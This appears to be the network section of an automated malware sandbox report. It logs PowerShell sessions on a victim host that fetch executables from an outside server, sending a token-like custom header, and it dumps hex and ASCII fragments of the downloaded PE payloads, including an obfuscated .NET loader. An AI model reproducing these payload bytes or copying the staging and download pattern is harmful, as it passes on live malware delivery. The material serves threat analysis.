                                                                                              Dec 27, 2024 22:33:10.082683086 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8b 44 24 04 85 c0 74 28 80 38 ef 75 13 80 78 01 bb 75 0d 80 78 02 bf 75 07 83 c0 03 89 44 24 04 8d 44 24 04 6a 00 50 e8 14 00
                                                                                              Data Ascii: D$t(8uxuxuD$D$jP1USWV |$81t$4.]Spt%E.]SpEuMY1$T%DsD$P6lp\$
                                                                                              Dec 27, 2024 22:33:10.082699060 CET248INData Raw: 14 50 e8 ad 6b 00 00 83 c4 04 39 c3 0f 85 7a 02 00 00 8b 1e 0f b6 2b 55 e8 47 6c 00 00 83 c4 04 85 c0 74 19 43 89 1e 0f b6 2b 55 e8 34 6c 00 00 83 c4 04 43 85 c0 75 ed 89 e8 4b eb 02 89 e8 3c 3a 0f 85 45 02 00 00 43 89 1e ff 74 24 08 56 e8 40 fb
                                                                                              Data Ascii: Pk9z+UGltC+U4lCuK<:ECt$V@-PWt$6.]SktE.]SkEuM,)E.]SkEu}}D$T$
                                                                                              Dec 27, 2024 22:33:10.082793951 CET1236INData Raw: 01 00 00 56 ff 15 00 50 44 00 83 c4 04 e9 39 01 00 00 51 e8 b4 09 00 00 83 c4 04 e9 2b 01 00 00 51 e9 a6 01 00 00 84 db 0f 84 27 01 00 00 89 7c 24 08 ff 74 24 08 56 e8 60 fa ff ff 83 c4 08 85 c0 0f 84 56 01 00 00 89 c7 8b 2c 24 8b 5d 0c 39 5d 08
                                                                                              Data Ascii: VPD9Q+Q'|$t$V`V,$]9]rzsRPD_$JD$tjtUQP.iM1QPDD$E]EEM<E.}Wjt#E
                                                                                              Dec 27, 2024 22:33:10.082806110 CET1236INData Raw: cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 10 31 ff 83 7c 24 24 00 0f 84 c0 00 00 00 8b 74 24 28 85 f6 0f 84 b4 00 00 00 56 e8 ba 65 00 00 83 c4 04 89 44 24 04 50 56 e8 bc 07 00 00 8b 4c 24 2c 83 c4 08 89 c2 8b 71 20 8d 6e ff 89 f0 83 e8 01 89 44
                                                                                              Data Ascii: USWV1|$$t$(VeD$PVL$,q nD$!AD$$ENtn#D$|$t\A9uA<WVeT$L$(;D$ut$Wt$0WeT$L$0uAtxux1^_[]L$1t
                                                                                              Dec 27, 2024 22:33:10.082817078 CET1236INData Raw: 24 08 39 51 08 76 13 8b 49 04 8b 0c 91 85 c9 74 09 83 79 04 04 75 03 8b 41 08 c3 cc cc cc cc cc cc cc cc cc 57 56 8b 44 24 0c 85 c0 0f 84 11 01 00 00 8b 48 04 83 f9 02 0f 84 f9 00 00 00 83 f9 05 0f 84 b6 00 00 00 83 f9 04 0f 85 f3 00 00 00 8b 70
                                                                                              Data Ascii: $9QvItyuAWVD$Hp~t.1F4PDF4G;~rFFF vPDvPDvPDvPDvPDFFFF
                                                                                              Dec 27, 2024 22:33:10.082829952 CET1236INData Raw: 00 50 44 00 83 c4 04 ff 34 24 ff 15 00 50 44 00 83 c4 04 56 ff 15 00 50 44 00 83 c4 04 b8 ff ff ff ff 83 c4 34 5e 5f 5b 5d c3 31 f6 89 74 24 08 83 7f 18 00 74 31 31 db 90 90 90 90 90 90 90 90 8b 47 0c 8b 4f 10 8b 2c 99 55 ff 34 98 8d 44 24 10 50
                                                                                              Data Ascii: PD4$PDVPD4^_[]1t$t11GO,U4D$P)uluC;_rGGG wPDwPDwPDwPDwPDt$1XD$ D$$D$(t$PDt$
                                                                                              Dec 27, 2024 22:33:10.082984924 CET1236INData Raw: 03 83 c0 c9 83 f9 ff 74 26 83 fa ff 74 21 83 fd ff 74 1c 83 f8 ff 74 17 8b 74 24 18 c1 e1 0c c1 e2 08 09 ca c1 e5 04 09 c5 09 d5 89 2e 31 ff 89 f8 5e 5f 5b 5d c3 cc cc cc cc cc cc 55 53 57 56 be ff ff ff ff 85 d2 74 66 89 d7 89 cb 89 d0 83 e0 fb
                                                                                              Data Ascii: t&t!ttt$.1^_[]USWVtfRPDt<C1tKtQPUUKQPDk{^_[]USWVl$(st$,L$$Vn^i
                                                                                              Dec 27, 2024 22:33:10.083004951 CET1236INData Raw: 75 0f 83 be 88 00 00 00 00 75 06 83 7e 5c 00 74 11 56 e8 51 00 00 00 83 c4 04 89 46 6c e9 f8 fe ff ff 53 56 e8 cf 0a 00 00 83 c4 08 85 c0 78 27 89 6e 60 83 fb 03 75 d9 8d 86 72 92 01 00 c7 46 24 00 00 00 00 68 00 00 02 00 6a 00 50 e8 b6 51 00 00
                                                                                              Data Ascii: uu~\tVQFlSVx'n`urF$hjPQFlWVt$Fxt+NpF|tC8)NXV\9rFtrWQPQ~X)~\F|8~`t1~\1^_USWV@l$T
                                                                                              Dec 27, 2024 22:33:10.083018064 CET1236INData Raw: c0 90 90 90 38 0c 02 75 07 40 39 c6 75 f6 89 f0 31 d2 83 f8 03 0f 93 c1 73 02 31 c0 88 ca 89 54 24 08 e9 fd 01 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 c7 44 24 08 00 00 00 00 39 d8 0f 83 e0 01 00 00 31 c9 83 f8 20 0f 93 c1 8b 54 24 54 8b 74
                                                                                              Data Ascii: 8u@9u1s1T$D$91 T$TtN\$L$(L$8\$L$ D$|$)L$,L$,AL$,|$jL$TYrVL$)9;t$TT$ 8
                                                                                              Dec 27, 2024 22:33:10.202714920 CET1236INData Raw: 72 05 b8 00 80 00 00 89 45 24 8b 45 28 3b 44 24 3c 0f 87 79 f7 ff ff 8b 4d 3c 81 f9 01 7c 00 00 0f 82 91 f7 ff ff 2b 44 24 34 6b c0 73 c1 e8 07 39 c8 0f 83 58 f7 ff ff f6 45 0a 08 0f 84 75 f7 ff ff e9 49 f7 ff ff f7 44 24 24 00 00 01 00 0f 85 d0
                                                                                              Data Ascii: rE$E(;D$<yM<|+D$4ks9XEuID$$==MT]LEPsE8U(ru(U,j)DT$fM+DfM-E8U(ru(U,j)D


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.449742147.45.44.131807824C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 27, 2024 22:33:08.738132954 CET157OUTGET /infopage/hgfpj.exe HTTP/1.1
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Host: 147.45.44.131
                                                                                              Dec 27, 2024 22:33:10.040410995 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:09 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 16:22:08 GMT
                                                                                              ETag: "4c000-62a1aa1957b5c"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 311296
                                                                                              Content-Type: application/x-msdos-program
                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 86 59 69 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 b2 00 00 00 00 00 00 00 86 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 3b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 5c 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 3d [TRUNCATED]
                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELYig@p@;0\;=.text `.rdata "@@.data8PT0@.reloc\;0<@B
                                                                                              Dec 27, 2024 22:33:10.040431976 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8b 44 24 04 85 c0 74 28 80 38 ef 75 13 80 78 01 bb 75 0d 80 78 02 bf 75 07 83 c0 03 89 44 24 04 8d 44 24 04 6a 00 50 e8 14 00
                                                                                              Data Ascii: D$t(8uxuxuD$D$jP1USWV |$81t$4.]Spt%E.]SpEuMY1$T%DsD$P6lp\$
                                                                                              Dec 27, 2024 22:33:10.040441036 CET1236INData Raw: 14 50 e8 ad 6b 00 00 83 c4 04 39 c3 0f 85 7a 02 00 00 8b 1e 0f b6 2b 55 e8 47 6c 00 00 83 c4 04 85 c0 74 19 43 89 1e 0f b6 2b 55 e8 34 6c 00 00 83 c4 04 43 85 c0 75 ed 89 e8 4b eb 02 89 e8 3c 3a 0f 85 45 02 00 00 43 89 1e ff 74 24 08 56 e8 40 fb
                                                                                              Data Ascii: Pk9z+UGltC+U4lCuK<:ECt$V@-PWt$6.]SktE.]SkEuM,)E.]SkEu}}D$T$
                                                                                              Dec 27, 2024 22:33:10.040566921 CET1236INData Raw: 2c 00 74 36 8b 74 24 30 85 f6 74 2e 56 e8 ce 66 00 00 83 c4 04 89 44 24 04 50 56 e8 d0 08 00 00 8b 4c 24 34 83 c4 08 89 c2 8b 69 20 8d 5d ff 89 e8 83 e8 01 89 44 24 0c 73 0c dd 44 24 10 83 c4 18 5e 5f 5b 5d c3 21 d3 8b 41 04 89 44 24 08 89 14 24
                                                                                              Data Ascii: ,t6t$0t.VfD$PVL$4i ]D$sD$^_[]!AD$$CMt#D$t$<tA9uA4VVfT$L$0;D$ut$Vt$8WfT$L$8uAtxj@\$^L$1tyuA
                                                                                              Dec 27, 2024 22:33:10.040576935 CET1236INData Raw: 04 50 56 e8 14 04 00 00 8b 4c 24 2c 83 c4 08 89 c2 8b 59 20 8d 6b ff 89 d8 83 e8 01 89 44 24 0c 73 0a 31 c0 83 c4 10 5e 5f 5b 5d c3 21 d5 8b 41 04 89 44 24 08 89 14 24 eb 06 90 90 45 4b 74 e2 89 e8 23 44 24 0c 8b 74 24 08 8b 3c 86 83 ff ff 74 d0
                                                                                              Data Ascii: PVL$,Y kD$s1^_[]!AD$$EKt#D$t$<tA9uA4VaT$L$(;D$ut$Vt$0aT$L$0uAt1T$,9QpL$1tT$9QvAD$t@1L$1
                                                                                              Dec 27, 2024 22:33:10.040656090 CET1236INData Raw: c1 e1 02 51 ff 15 04 50 44 00 83 c4 04 89 c6 89 44 24 0c c1 e7 02 57 ff 15 04 50 44 00 83 c4 04 89 44 24 30 89 44 24 14 57 ff 15 04 50 44 00 83 c4 04 89 44 24 04 89 44 24 18 57 ff 15 04 50 44 00 83 c4 04 89 04 24 89 44 24 1c 57 8b 7c 24 34 ff 15
                                                                                              Data Ascii: QPDD$WPDD$0D$WPDD$D$WPD$D$W|$4PDD$t{tw|$tp<$tjtfFFFFFFF u|$,tMutJ7HVPDWPD
                                                                                              Dec 27, 2024 22:33:10.040667057 CET1236INData Raw: ff ff ff ff 85 c9 0f 84 1b 01 00 00 0f be 56 01 85 d2 0f 84 0f 01 00 00 0f be 46 02 85 c0 0f 84 03 01 00 00 0f be 76 03 85 f6 0f 84 f7 00 00 00 89 cb 80 c3 d0 80 fb 09 77 05 83 c1 d0 eb 23 89 cb 80 c3 9f 80 fb 05 77 05 83 c1 a9 eb 14 89 cb 80 c3
                                                                                              Data Ascii: VFvw#wrw#wrw#wrw#wr
                                                                                              Dec 27, 2024 22:33:10.040677071 CET1236INData Raw: c7 01 00 00 00 00 c7 46 6c fe ff ff ff b8 fe ff ff ff 5e 5f 5b 5d c3 85 c0 74 09 85 ff 75 05 83 38 00 75 d2 85 c9 74 09 85 d2 75 05 83 39 00 75 c1 31 d2 8b 5c 24 28 83 fb 04 0f 94 c2 09 d5 89 6e 68 83 7e 5c 00 75 06 83 7e 60 00 74 69 85 c0 74 09
                                                                                              Data Ascii: Fl^_[]tu8utu9u1\$(nh~\u~`titN|tC9)NXV\9rFtrWQP(R~X)~\F|8~`t1~\_1[V!t"0#Ft)PWvFt
                                                                                              Dec 27, 2024 22:33:10.040688038 CET1236INData Raw: 00 2b 6c 24 1c 39 cd 72 02 89 cd 8b 44 24 54 89 68 24 01 da 29 5c 24 0c 8b 5c 24 1c eb 55 90 90 90 90 90 90 90 90 90 90 90 90 90 90 01 de 01 da c7 44 24 0c 00 00 00 00 89 f3 eb 10 c7 44 24 0c 00 00 00 00 90 90 90 90 90 90 90 90 bd 00 80 00 00 29
                                                                                              Data Ascii: +l$9rD$Th$)\$\$UD$D$)9rD$Th$|$0u~HPL$tD$L$Tqy|$t$$T$}D$]L$$ML$Tt,D$H%D$
                                                                                              Dec 27, 2024 22:33:10.040704966 CET1236INData Raw: 45 50 00 00 00 00 e9 df 00 00 00 85 db 0f 84 8b 00 00 00 83 7d 14 00 0f 84 22 01 00 00 01 45 3c 89 c1 80 c1 fd 8b 55 28 88 0a 89 d9 83 f1 01 81 e3 fe ff ff 3f 01 db 29 cb 8b 4d 28 88 59 01 89 d9 c1 e9 08 8b 55 28 88 4a 02 83 45 28 03 8b 55 2c 89
                                                                                              Data Ascii: EP}"E<U(?)M(YU(JE(U,M8j+D=MTL$MLM(U<=BU<QU(M,)M8uE8M(QU(M,fET$E)E E$
                                                                                              Dec 27, 2024 22:33:10.160582066 CET1236INData Raw: 00 00 33 56 3c 89 56 3c 0f b7 d2 d3 e2 09 d0 89 46 48 83 c9 10 89 4e 44 eb 1b 90 90 90 90 90 90 90 90 90 90 c1 e8 08 89 46 48 83 c1 f8 89 4e 44 83 f9 07 76 18 8b 56 30 3b 56 34 73 e7 8d 4a 01 89 4e 30 88 02 8b 4e 44 8b 46 48 eb d7 81 76 3c ff ff
                                                                                              Data Ascii: 3V<V<FHNDFHNDvV0;V4sJN0NDFHv<tg1B;V<sS~@>FHNDFHNDv~0;~4sON0NDFHL$FDuPFDFH


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.449743147.45.44.131807880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 27, 2024 22:33:08.783274889 CET181OUTGET /infopage/hgfpj.exe HTTP/1.1
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Host: 147.45.44.131
                                                                                              Connection: Keep-Alive
                                                                                              Dec 27, 2024 22:33:10.088680029 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:09 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 16:22:08 GMT
                                                                                              ETag: "4c000-62a1aa1957b5c"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 311296
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-msdos-program
                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 86 59 69 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 b2 00 00 00 00 00 00 00 86 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 3b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 05 00 5c 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 3d [TRUNCATED]
                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELYig@p@;0\;=.text `.rdata "@@.data8PT0@.reloc\;0<@B
                                                                                              Dec 27, 2024 22:33:10.088742971 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: D$t(8uxuxuD$D$jP1USWV |$81t$4.]Spt%E
                                                                                              Dec 27, 2024 22:33:10.088752985 CET1236INData Raw: 89 2e 0f b6 5d 00 53 e8 84 70 00 00 83 c4 04 45 85 c0 75 ec 4d 0f b6 c3 83 c0 de 83 f8 59 0f 87 e4 00 00 00 31 db ff 24 85 54 25 44 00 e8 8e 73 00 00 c7 00 00 00 00 00 8d 44 24 1c 50 ff 36 e8 6c 70 00 00 83 c4 08 dd 5c 24 08 e8 70 73 00 00 31 db
                                                                                              Data Ascii: .]SpEuMY1$T%DsD$P6lp\$ps18"D$uP%DrDs8t:s8"|$.<$)D$r1}0u}.ut jh;DU=oD$u}.urvD=jPh;D
                                                                                              Dec 27, 2024 22:33:10.088850021 CET1236INData Raw: 00 45 90 90 90 90 90 90 90 90 90 90 89 2e 0f b6 5d 00 53 e8 a4 6b 00 00 83 c4 04 45 85 c0 75 ec 80 fb 7d 0f 84 00 02 00 00 80 7d ff 00 0f 84 00 02 00 00 c7 44 24 14 00 00 00 00 89 f1 8d 54 24 14 e8 a6 0f 00 00 85 c0 0f 85 05 ff ff ff e9 c5 01 00
                                                                                              Data Ascii: E.]SkEu}}D$T$VPD9Q+Q'|$t$V`V,$]9]rzsRPD_$JD$tjt
                                                                                              Dec 27, 2024 22:33:10.088861942 CET1236INData Raw: 00 8b 54 24 0c 8b 4c 24 38 83 c4 0c 85 c0 75 a8 8b 41 10 8b 04 b8 85 c0 0f 84 74 ff ff ff 83 78 04 03 0f 85 6a ff ff ff dd 40 08 dd 5c 24 10 e9 5e ff ff ff cc cc cc cc 8b 4c 24 04 31 c0 85 c9 74 09 83 79 04 04 75 03 8b 41 08 c3 cc cc cc cc cc cc
                                                                                              Data Ascii: T$L$8uAtxj@\$^L$1tyuAUSWV1|$$t$(VeD$PVL$,q nD$!AD$$ENtn#D$|$t\A9uA<WVeT$L$(;D$u
                                                                                              Dec 27, 2024 22:33:10.088874102 CET1236INData Raw: 2c 39 51 04 0f 94 c0 e9 70 ff ff ff cc cc cc cc cc cc cc cc 8b 4c 24 04 31 c0 85 c9 74 0f 8b 54 24 08 39 51 08 76 06 8b 41 04 8b 04 90 c3 cc cc cc cc cc cc 8b 44 24 04 85 c0 74 04 8b 40 08 c3 31 c0 c3 cc 8b 4c 24 04 31 c0 85 c9 74 1c 8b 54 24 08
                                                                                              Data Ascii: ,9QpL$1tT$9QvAD$t@1L$1tT$9QvItyuAWVD$Hp~t.1F4PDF4G;~rFFF vP
                                                                                              Dec 27, 2024 22:33:10.088887930 CET1236INData Raw: c7 46 1c ff ff ff ff 83 c6 20 83 c3 f8 75 c1 85 ed 8b 7c 24 2c 74 15 90 90 90 90 90 90 90 90 90 c7 06 ff ff ff ff 83 c6 04 4d 75 f4 85 ff 74 4a 8b 37 eb 48 56 89 c6 ff 15 00 50 44 00 83 c4 04 57 ff 15 00 50 44 00 83 c4 04 ff 74 24 04 ff 15 00 50
                                                                                              Data Ascii: F u|$,tMutJ7HVPDWPDt$PD4$PDVPD4^_[]1t$t11GO,U4D$P)uluC;_rGGG wPDwPDwPDw
                                                                                              Dec 27, 2024 22:33:10.089042902 CET520INData Raw: 80 fb 05 77 05 83 c0 a9 eb 14 89 c3 80 c3 bf 80 fb 06 72 07 b8 ff ff ff ff eb 03 83 c0 c9 89 c5 89 f0 89 c3 80 c3 d0 80 fb 09 77 05 83 c0 d0 eb 23 89 c3 80 c3 9f 80 fb 05 77 05 83 c0 a9 eb 14 89 c3 80 c3 bf 80 fb 06 72 07 b8 ff ff ff ff eb 03 83
                                                                                              Data Ascii: wrw#wrt&t!ttt$.1^_[]USWVtfRPDt<C1tKtQPUUKQ
                                                                                              Dec 27, 2024 22:33:10.089055061 CET1236INData Raw: 08 83 c0 0f 3b 04 24 8b 04 24 72 a8 01 d5 8b 74 24 04 89 da 29 c2 0f 83 45 ff ff ff 89 54 24 08 89 c6 83 e6 03 89 5c 24 0c 89 d8 89 ea 74 11 90 90 90 90 90 40 0f b6 1a 01 df 01 f9 42 4e 75 f4 83 7c 24 08 fc 0f 87 09 ff ff ff 8b 1c 24 29 c3 31 c0
                                                                                              Data Ascii: ;$$rt$)ET$\$t@BNu|$$)14|t|9u^_[]SWVD$tWT$t$6t;8@134(D!!3
                                                                                              Dec 27, 2024 22:33:10.089113951 CET1236INData Raw: 8b 4c 24 0c 89 cf 39 c1 72 02 89 c7 89 d0 85 d2 74 03 8d 04 3a 89 44 24 10 89 ee 8b 6d 1c 8d 04 2b 83 c0 fe 89 c1 81 e1 ff 7f 00 00 0f b6 8c 0e 90 00 00 00 8d 14 2b 4a 81 e2 ff 7f 00 00 0f b6 94 16 90 00 00 00 29 7c 24 0c 01 df 89 7e 20 8b 74 24
                                                                                              Data Ascii: L$9rt:D$m++J)|$~ t$;t$|$1t$TT$G1Nrf~rBfNrE@;T$t'.w.\$T$L$
                                                                                              Dec 27, 2024 22:33:10.208444118 CET1236INData Raw: 0f b6 14 0a 3a 14 0e 75 0b 41 39 4c 24 1c 75 ec 8b 4c 24 1c 39 c1 76 2e 3b 4c 24 1c 74 3c 8b 44 24 14 01 c8 8b 74 24 54 0f b6 94 06 8f 00 00 00 88 54 24 03 0f b6 84 06 90 00 00 00 88 44 24 20 89 7c 24 08 89 c8 8b 4c 24 2c f7 d9 8b 7c 24 14 89 ce
                                                                                              Data Ascii: :uA9L$uL$9v.;L$t<D$t$TT$D$ |$L$,|$|$D$|$\$ u9tD$$t{svl$TM(U<\$ ELU<)M(AU(JE(U,M8=


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              10192.168.2.449744147.45.44.131806588C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 27, 2024 22:33:09.281054974 CET181OUTGET /infopage/ubvsd.exe HTTP/1.1
                                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                              Host: 147.45.44.131
                                                                                              Connection: Keep-Alive
                                                                                              Dec 27, 2024 22:33:10.585994005 CET1236INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:10 GMT
                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                              Last-Modified: Wed, 25 Dec 2024 00:05:52 GMT
                                                                                              ETag: "8e00-62a0cfe2cdd29"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 36352
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-msdos-program
                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 91 b7 cd 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 84 00 00 00 08 00 00 00 00 00 00 1a a3 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 a2 00 00 4f 00 00 00 00 c0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 ac a2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0 @ `O H.text `.rsrc@@.reloc@BHD"h0ss(oooooi(oiiYii(oio ,o,o,o*(t0(((o*(*0rpss o!rsp~(o"&o!rs
                                                                                              Dec 27, 2024 22:33:10.586047888 CET1236INData Raw: 70 7e 01 00 00 04 28 02 00 00 06 6f 22 00 00 0a 26 07 17 6f 23 00 00 0a 07 17 8d 22 00 00 01 25 16 06 7e 01 00 00 04 28 02 00 00 06 a2 6f 24 00 00 0a 6f 25 00 00 0a 72 3a 74 00 70 7e 01 00 00 04 28 02 00 00 06 6f 26 00 00 0a 72 94 74 00 70 7e 01
                                                                                              Data Ascii: p~(o"&o#"%~(o$o%r:tp~(o&rtp~(o'o(&*(*(*(*(*j(rtp(o*BSJBv4.0.30319l#~,P#Strings|(u#US~
                                                                                              Dec 27, 2024 22:33:10.586066008 CET1236INData Raw: 00 42 69 74 56 65 63 74 6f 72 33 32 00 67 32 00 70 32 00 43 6f 6e 73 6f 6c 65 41 70 70 31 36 37 00 67 65 74 5f 55 54 46 38 00 3c 4d 6f 64 75 6c 65 3e 00 73 65 74 5f 49 56 00 6d 73 63 6f 72 6c 69 62 00 41 64 64 00 53 79 73 74 65 6d 2e 43 6f 6c 6c
                                                                                              Data Ascii: BitVector32g2p2ConsoleApp167get_UTF8<Module>set_IVmscorlibAddSystem.Collections.SpecializedGetMethodCompileAssemblyFromSourceset_ModePaddingModeCipherModeInvokeIDisposableSystem.Net.MimeGetTypeSystem.CoreMethodBaseDispose
                                                                                              Dec 27, 2024 22:33:10.586179018 CET1236INData Raw: 6e 76 65 72 74 00 53 79 73 74 65 6d 2e 54 65 78 74 00 49 6d 67 6c 73 77 00 41 72 72 61 79 00 73 65 74 5f 4b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 43 6f 6d 70 69 6c 65 64 41 73
                                                                                              Data Ascii: nvertSystem.TextImglswArrayset_KeySystem.Security.Cryptographyget_CompiledAssemblyCopyset_GenerateInMemorys7eV61nHmqYXSS+ryCq4pt/5Wpqq5HxdeLHXTEHvwc/zpyD/XGm2DyHLr95ry
                                                                                              Dec 27, 2024 22:33:10.586194992 CET1236INData Raw: 00 32 00 59 00 43 00 51 00 32 00 6c 00 4b 00 71 00 73 00 49 00 77 00 61 00 43 00 7a 00 59 00 6e 00 4c 00 75 00 5a 00 34 00 74 00 6d 00 49 00 56 00 79 00 4a 00 77 00 34 00 57 00 36 00 55 00 68 00 6c 00 49 00 72 00 64 00 74 00 4f 00 70 00 72 00 2b
                                                                                              Data Ascii: 2YCQ2lKqsIwaCzYnLuZ4tmIVyJw4W6UhlIrdtOpr+tNdW3vqkhU8XyaXCKs9GA8lM8UCFkZ+kiJGJspAPSPXC0FjSGpiIs5LRtws1CW+PuXqQ2Lpvd5ZUsFST
                                                                                              Dec 27, 2024 22:33:10.586210966 CET1236INData Raw: 00 31 00 6e 00 71 00 5a 00 74 00 55 00 31 00 44 00 44 00 6a 00 54 00 61 00 4c 00 64 00 45 00 79 00 79 00 57 00 42 00 31 00 76 00 4d 00 73 00 4a 00 41 00 30 00 70 00 79 00 78 00 39 00 51 00 4e 00 39 00 75 00 68 00 34 00 64 00 49 00 54 00 50 00 70
                                                                                              Data Ascii: 1nqZtU1DDjTaLdEyyWB1vMsJA0pyx9QN9uh4dITPp8I6d+YKrfTb7W4lSia7zPzzCvXV1QXwclyuVeIcDXENvlXiOTChtQwxDxxwihXPmvksDBkeZ47M4LuWf
